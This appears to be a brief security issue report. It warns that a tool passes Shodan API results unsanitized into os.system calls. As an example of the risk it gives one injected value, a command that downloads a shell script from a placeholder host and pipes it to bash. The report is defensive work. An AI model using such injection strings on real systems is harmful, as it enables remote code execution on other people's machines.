The os.system call does not properly sanitize input collected from Shodan.

Its likely SHODAN isn't going to do something bad, but in the unlikely event the API is compromised or someone wants to cause harm, the os.system calls should be properly sanitized or passed to subprocess.Popen without shell=true. Example: ip=; wget badsite.com/badcode.sh|bash;